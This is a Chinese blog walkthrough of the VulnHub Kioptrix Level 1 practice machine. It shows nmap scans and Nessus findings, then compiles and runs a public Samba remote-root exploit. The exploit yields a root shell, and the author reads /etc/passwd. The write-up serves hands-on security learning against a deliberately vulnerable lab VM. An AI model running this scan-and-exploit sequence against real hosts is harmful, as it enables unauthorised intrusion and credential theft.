Kioptrix 1级VulnHub Boot2Root
一、简介
机器URL:https://www.vulnhub.com/entry/kioptrix-level-1-1,22/描述:此Kioptrix VM映像很容易挑战。游戏的目的是通过任何可能的方式获得root用户访问权限(除了实际入侵VM服务器或播放器外)。这些游戏的目的是学习漏洞评估和利用中的基本工具和技术。成功完成挑战的方法不止一种。
二、环境搭建
访问 https://www.vulnhub.com/entry/kioptrix-level-1-1,22/下载vm镜像
Kali:192.168.2.133 靶机:192.168.2.227
三、实战渗透
nmap扫描靶机
nmap 192.168.2.0/24 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 22:38 CST Nmap scan report for RM2100.lan (192.168.2.1) Host is up (0.0034s latency). Not shown: 996 closed ports PORT STATE SERVICE 22/tcp open ssh 53/tcp open domain 80/tcp open http 1080/tcp open socks Nmap scan report for chuangmi-plug-v3_miap5EDA.lan (192.168.2.100) Host is up (0.0047s latency). All 1000 scanned ports on chuangmi-plug-v3_miap5EDA.lan (192.168.2.100) are closed Nmap scan report for MiAiSoundbox.lan (192.168.2.117) Host is up (0.0058s latency). Not shown: 999 closed ports PORT STATE SERVICE 53/tcp open domain Nmap scan report for zedeMacBook-Pro.lan (192.168.2.120) Host is up (0.00055s latency). All 1000 scanned ports on zedeMacBook-Pro.lan (192.168.2.120) are closed (720) or filtered (280) Nmap scan report for bad.lan (192.168.2.133) Host is up (0.00068s latency). All 1000 scanned ports on bad.lan (192.168.2.133) are closed Nmap scan report for lumi-gateway-v3_miio87687718.lan (192.168.2.153) Host is up (0.0089s latency). All 1000 scanned ports on lumi-gateway-v3_miio87687718.lan (192.168.2.153) are closed Nmap scan report for 192.168.2.227 Host is up (0.0023s latency). Not shown: 994 closed ports PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 111/tcp open rpcbind 139/tcp open netbios-ssn 443/tcp open https 1024/tcp open kdm
确定靶机ip为192.168.2.227
xiaoze@bad:~/下载$ sudo nmap -sS -sV -O -T4 -p- 192.168.2.227 [sudo] xiaoze 的密码: Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-28 23:20 CST Nmap scan report for 192.168.2.227 Host is up (0.00064s latency). Not shown: 65529 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99) 80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) 111/tcp open rpcbind 2 (RPC #100000) 139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP) 443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b 1024/tcp open status 1 (RPC #100024) MAC Address: 00:50:56:3D:E9:32 (VMware) Device type: general purpose Running: Linux 2.4.X OS CPE: cpe:/o:linux:linux_kernel:2.4 OS details: Linux 2.4.9 - 2.4.18 (likely embedded) Network Distance: 1 hop OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.92 seconds
Nessus扫描结果(谁让我太水了,只能借助Nessus)
确定samba存在漏洞,在https://www.exploit-db.com/网站上搜索了一下 找到了Samba <2.2.8(Linux / BSD)-远程执行代码,
下载再来是XX.c文件 gcc编译一下
xiaoze@bad:~/下载gcc samba.c -o exploit xiaoze@bad:~/下载 ll 总用量 92 -rwxr-xr-x 1 xiaoze xiaoze 41256 8月 29 00:11 exploit -rw-r--r-- 1 xiaoze xiaoze 45115 8月 28 22:24 samba.c xiaoze@bad:~/下载./exploit samba-2.2.8./exploit -b 0 192.168.2.227 samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be) -------------------------------------------------------------- + Bruteforce mode. (Linux) + Host is running samba. + Worked! -------------------------------------------------------------- *** JE MOET JE MUIL HOUWE Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown uid=0(root) gid=0(root) groups=99(nobody) whoami root pwd /tmp cat /etc/passwd root:x:0:0:root:/root:/bin/bash bin:x:1:1:bin:/bin:/sbin/nologin daemon:x:2:2:daemon:/sbin:/sbin/nologin adm:x:3:4:adm:/var/adm:/sbin/nologin lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin sync:x:5:0:sync:/sbin:/bin/sync shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown halt:x:7:0:halt:/sbin:/sbin/halt mail:x:8:12:mail:/var/spool/mail:/sbin/nologin news:x:9:13:news:/var/spool/news: uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin operator:x:11:0:operator:/root:/sbin/nologin games:x:12:100:games:/usr/games:/sbin/nologin gopher:x:13:30:gopher:/var/gopher:/sbin/nologin ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin nobody:x:99:99:Nobody:/:/sbin/nologin mailnull:x:47:47::/var/spool/mqueue:/dev/null rpm:x:37:37::/var/lib/rpm:/bin/bash xfs:x:43:43:X Font Server:/etc/X11/fs:/bin/false rpc:x:32:32:Portmapper RPC user:/:/bin/false rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin nscd:x:28:28:NSCD Daemon:/:/bin/false ident:x:98:98:pident user:/:/sbin/nologin radvd:x:75:75:radvd user:/:/bin/false postgres:x:26:26:PostgreSQL Server:/var/lib/pgsql:/bin/bash apache:x:48:48:Apache:/var/www:/bin/false squid:x:23:23::/var/spool/squid:/dev/null pcap:x:77:77::/var/arpwatch:/bin/nologin john:x:500:500::/home/john:/bin/bash harold:x:501:501::/home/harold:/bin/bash cat /ver/mail/root cat: /ver/mail/root: No such file or directory
您可能感兴趣的文章
本文地址:http://www.ouyangxiaoze.com/2020/08/656.html
文章标签:Kioptrix , Kioptrix 1级
版权声明:本文为原创文章,版权归 欧阳小泽 所有,欢迎分享本文,转载请保留出处!
文章标签:Kioptrix , Kioptrix 1级
版权声明:本文为原创文章,版权归 欧阳小泽 所有,欢迎分享本文,转载请保留出处!
发表于 2021-11-25 18:53 沙发
博客卖吗